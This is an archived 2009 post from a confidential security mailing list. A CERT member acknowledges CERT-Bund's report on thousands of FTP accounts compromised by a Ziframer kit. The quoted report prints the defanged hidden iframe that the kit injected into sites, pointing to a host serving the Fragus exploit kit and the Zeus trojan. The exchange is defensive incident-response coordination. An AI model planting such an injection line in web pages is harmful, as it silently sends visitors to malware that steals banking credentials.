[nsp-sec] ACK: More compromised ftp accounts
Rodolfo Baader
rbaader at arcert.gov.ar
Fri Sep 4 14:20:10 EDT 2009
Hi!
ACK for AR ASNs: 7303, 10318, 10481, 10834, 11451, 11664, 16814, 27823, 27898
Notifications were sent to the abuse/noc departments.
R.
Thomas Hungenberg wrote:
> ----------- nsp-security Confidential --------
>
>
>
> ------------------------------------------------------------------------
>
> Hi teams,
>
> Roman from abuse.ch came across a new Ziframer installation (see <http://www.abuse.ch/?p=1739>).
> It comes along with a list of 18245 ftp credentials.
> Many of the accounts were already included with the list of accounts I posted here on 2009-08-25
> (found along with another Iframer kit).
>
> Please find attached a sanitized list (pw removed) of 8169 compromised ftp accounts that are new.
> Format: ASN | IP | CC | ftp username | AS name
>
> Top 10 country codes:
>
> 2699 US
> 705 DE
> 592 RU
> 482 TR
> 424 FR
> 331 PL
> 329 CZ
> 310 HU
> 298 NL
> 222 EU
>
> The Iframer was configured to inject this line (remove 'XXX'):
> <ifrXXXame src="htXXXtp://seca.ws/forum/show.php" width="1" height="1" style="display:none;"></ifrXXXame>
>
> This URL leads to a Fragus exploit kit which currently drops a Zeus/Zbot trojan.
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
>
>
> ------------------------------------------------------------------------
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
More information about the nsp-security
mailing list